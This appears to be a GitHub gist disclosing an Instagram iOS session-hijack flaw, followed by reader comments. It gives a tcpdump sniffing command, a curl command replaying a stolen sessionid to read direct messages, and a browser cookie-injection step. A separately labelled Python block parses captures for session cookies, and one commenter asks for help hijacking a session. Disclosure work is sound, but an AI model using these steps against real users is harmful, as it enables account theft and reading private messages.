
@stevegraham
Last active February 24, 2023 20:44
FB Responsible Disclosure

Instagram iOS session hijack

The Instagram iOS app makes API calls to non-HTTPS endpoints with its session cookies in the request headers, allowing full session hijack by anyone who can sniff the traffic.

Steps to reproduce (on Mac OS X):

  • Jump on an open or WEP encrypted wifi access point
  • Put your wireless interface into monitor mode (tcpdump's -I flag on OS X) and filter on traffic to i.instagram.com:
     # -I monitor mode, -n no name lookups, -s 2048 enough bytes to get the headers, -A print payload as ASCII
     sudo tcpdump -In -i en0 -s 2048 -A dst i.instagram.com
    
  • Wait for someone to use the Instagram iOS app on the same network
  • Extract the Cookie request header from the resulting output
  • Use the sessionid cookie value to make any API call as that user, even to HTTPS endpoints such as direct messages:
     curl -H 'User-Agent: Instagram 6.0.4 (iPhone6,2; iPhone OS 7_1_1; en_GB; en-GB) AppleWebKit/420+' \
       -H 'Cookie: sessionid=REDACTED' \
       https://i.instagram.com/api/v1/direct_share/inbox/
    

This returns the user's direct message inbox as JSON.
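To automate the "extract the Cookie header from the output" step, and to let you audit your own app's traffic for the same leak, here is an added example (not code from the gist or its author): a standard-library Python script that parses `tcpdump -nA` style text, picks out every readable HTTP request, and reports any that carries a session cookie in the clear. The capture text below is constructed for illustration (hypothetical addresses and token), and the cookie names other than sessionid are an assumption so the check also covers other apps.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Cookie names treated as session credentials. `sessionid` is the one the gist
# reports; the others are assumptions so the check also covers other apps.
SESSION_COOKIE_NAMES = {"sessionid", "session", "sid", "phpsessid", "jsessionid"}

# Summary line tcpdump -n prints per packet: "HH:MM:SS.us IP a.b.c.d.port > e.f.g.h.port: ..."
PACKET_HEADER = re.compile(
    r"^\d{2}:\d{2}:\d{2}\.\d+ IP (?P<src>[\d.]+)\.\d+ > (?P<dst>[\d.]+)\.(?P<dport>\d+): ")
# -A prints the IP/TCP header bytes as junk in front of the payload, so the request
# line is usually fused onto the end of a line of dots: search, don't match.
REQUEST_LINE = re.compile(r"(GET|POST|PUT|PATCH|DELETE|HEAD|OPTIONS) (\S+) HTTP/1\.[01]\s*$")


@dataclass
class PlaintextRequest:
    src: str
    dst: str
    method: str
    path: str
    headers: Dict[str, str]  # header names lower-cased

    @property
    def cookies(self) -> Dict[str, str]:
        """Parse the Cookie header into name -> value."""
        out: Dict[str, str] = {}
        for part in self.headers.get("cookie", "").split(";"):
            name, _, value = part.strip().partition("=")
            if name:
                out[name] = value
        return out

    def leaked_session_cookies(self) -> List[str]:
        return sorted(n for n in self.cookies if n.lower() in SESSION_COOKIE_NAMES)


def split_packets(capture: str) -> List[Tuple[re.Match, List[str]]]:
    """Group the capture into (summary-line match, ASCII payload lines) per packet."""
    packets: List[Tuple[re.Match, List[str]]] = []
    for line in capture.splitlines():
        m = PACKET_HEADER.match(line)
        if m:
            packets.append((m, []))
        elif packets:
            packets[-1][1].append(line)
    return packets


def parse_http_request(payload: List[str]) -> Optional[Tuple[str, str, Dict[str, str]]]:
    """(method, path, headers) if the payload is a readable HTTP request, else None."""
    for i, line in enumerate(payload):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        headers: Dict[str, str] = {}
        for hdr in payload[i + 1:]:
            if not hdr.strip():
                break  # blank line ends the header block
            name, sep, value = hdr.partition(":")
            if sep:
                headers[name.strip().lower()] = value.strip()
        return m.group(1), m.group(2), headers
    return None  # TLS or other non-HTTP bytes: nothing readable, which is what you want


def find_plaintext_requests(capture: str) -> List[PlaintextRequest]:
    found = []
    for m, payload in split_packets(capture):
        parsed = parse_http_request(payload)
        if parsed:
            method, path, headers = parsed
            found.append(PlaintextRequest(m["src"], m["dst"], method, path, headers))
    return found


def audit(capture: str) -> List[str]:
    """One finding per plaintext request that carries a session cookie."""
    findings = []
    for req in find_plaintext_requests(capture):
        leaked = req.leaked_session_cookies()
        if leaked:
            host = req.headers.get("host", req.dst)
            findings.append(f"{req.src} -> http://{host}{req.path}: "
                            f"session cookie(s) {', '.join(leaked)} sent in cleartext")
    return findings


# Constructed sample of `tcpdump -nA` output (hypothetical addresses and token):
# one plaintext API call, one TLS packet, one plaintext request with no session cookie.
SAMPLE_CAPTURE = """\
12:01:05.123456 IP 10.0.0.7.52311 > 54.0.0.1.80: Flags [P.], seq 1:412, ack 1, win 8192, length 411
E..'..@.@....GET /api/v1/feed/timeline/ HTTP/1.1
Host: i.instagram.com
User-Agent: Instagram 6.0.4 (iPhone6,2; iPhone OS 7_1_1; en_GB; en-GB) AppleWebKit/420+
Cookie: sessionid=EXAMPLE_SESSION_TOKEN; ds_user_id=123456

12:01:06.555555 IP 10.0.0.7.52312 > 54.0.0.2.443: Flags [P.], seq 1:200, ack 1, win 8192, length 199
E..P..@.@......V.l.......(TLS record bytes, unreadable)
12:01:07.000000 IP 10.0.0.9.49000 > 93.184.216.34.80: Flags [P.], seq 1:120, ack 1, win 8192, length 119
E..x..@.@....GET /index.html HTTP/1.1
Host: example.com
Accept: */*

"""
```

Feed audit() the saved text of a real tcpdump -A session; every finding is a request where the session credential is readable by anyone on the network, which is exactly the condition that "use SSL everywhere" removes. Encrypted packets produce no readable request line and are skipped, so a clean run against your own app's traffic is the result you want to see.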

I was able to perform a session hijack on my own account on my laptop while someone else browsed Instagram on my iPhone.

I was also able to:

  • take the cookie sniffed from the iOS app
  • go to instagram.com as a logged-out user
  • set document.cookie = $COOKIE
  • navigate to a profile
  • see I'm logged in as that user

There is some screwy behaviour where 'instagram.com/' gets into a redirect loop; I will see if I can fix that. However, going to 'instagram.com/someones_profile' works and shows me as logged in.

I think this attack is extremely severe because it allows full session hijack and is easily automated. I could go to the Apple Store tomorrow and reap thousands of accounts in one day, and then use them to post spam.

Recommendations:

  • Use SSL everywhere (serve every API endpoint over HTTPS only)
  • Revoke all currently logged-in sessions? (any sessionid that has already been sniffed stays valid until it is revoked)
@ceejayoz

@jasiek The gist says the session is valid even on HTTPS endpoints.

@rmrhz

rmrhz commented Jul 28, 2014

That's a nice catch.

@stevegraham
Author

@jasiek once you have a cookie, any endpoint can be authenticated with the cookie, HTTPS or HTTP.

@jasonmp85

"Sue"? Maybe not. But in the good ol' US of A you can probably be prosecuted under this by anyone with a sufficiently large axe to grind.

@donfrancisco

Got the instasheep domain name if you want me to point it at a github repo.

@anands

anands commented Jul 30, 2014

+1

@vs4vijay

Cool

@netpawn

netpawn commented Jul 31, 2014

As I read it, it works only on Mac though... right?

@boserup

boserup commented Jul 31, 2014

@Mamugian Given that the Instagram user is connected via an unsecured connection (HTTP) to the API, any device capable of TCP dumping will be able to do this.

@jlopez1286

The tool is for what platform? PC, Mac, Android?

@sasasa671

@Mamugian could work on any Unix/Linux platform.

@josephrexme

@jlopez1286 Seriously? tcpdump. Didn't expect to see such a question on this gist.

@rashidasgari

I'm not really experienced with packet sniffing and all this advanced networking stuff. But I was able to do the packet sniffing on an unsecured network using Wireshark and get the session ID from the cookie headers. What do I have to do from here? I would be grateful if anyone could help.
